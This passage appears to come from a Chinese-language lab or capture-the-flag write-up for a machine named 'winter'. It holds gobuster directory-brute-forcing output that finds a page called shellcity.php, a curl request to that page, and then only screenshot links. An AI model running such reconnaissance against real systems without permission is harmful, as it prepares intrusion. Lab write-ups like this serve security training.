gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html (Status: 200) [Size: 198]\n\/shellcity.php (Status: 200) [Size: 1040]\nProgress: 267346 \/ 882244 (30.30%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 268009 \/ 882244 (30.38%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u627e\u5230\u4e86\u5165\u53e3\u70b9\u4e86\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/winter]\n\u2514\u2500$ curl -s http:\/\/cmd.winter\/shellcity.php | html2text\n\n[name ] [********************] [Send]<\/code><\/pre>\n\u5c1d\u8bd5\u778e\u641e\u4e00\u4e2a\u8bd5\u8bd5\uff1a<\/p>\n
![\"image-20240819001003197\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253540.png\")
<\/div><\/p>\n![\"image-20240819001044390\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253541.png\")
<\/div><\/p>\n![\"image-20240819001201920\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253542.png\")
<\/div>![\"image-20240819001218625\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253543.png\")
<\/div><\/p>\n![\"OS](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253544.svg\")
<\/div><\/p>\n![\"image-20240819002826767\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253545.png\")
<\/div><\/p>\n![\"image-20240819002906069\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253546.png\")
<\/div><\/p>\n![\"image-20240819004730861\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253547.png\")
<\/div><\/p>\n![\"image-20240819005441711\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253548.png\")
<\/div>![\"image-20240819005720602\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253549.png\")
<\/div>![\"image-20240819005752936\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253550.png\")
<\/div><\/p>\n![\"image-20240819010742598\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253551.png\")
<\/div>![\"image-20240819010809699\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253552.png\")
<\/div><\/p>\n![\"image-20240819011547049\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253553.png\")
<\/div><\/p>\n![\"image-20240819012758608\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253554.png\")
<\/div><\/p>\n![\"image-20240819015338899\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253555.png\")
<\/div><\/p>\n![\"image-20240819023926917\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408190253556.png\")
<\/div><\/p>\n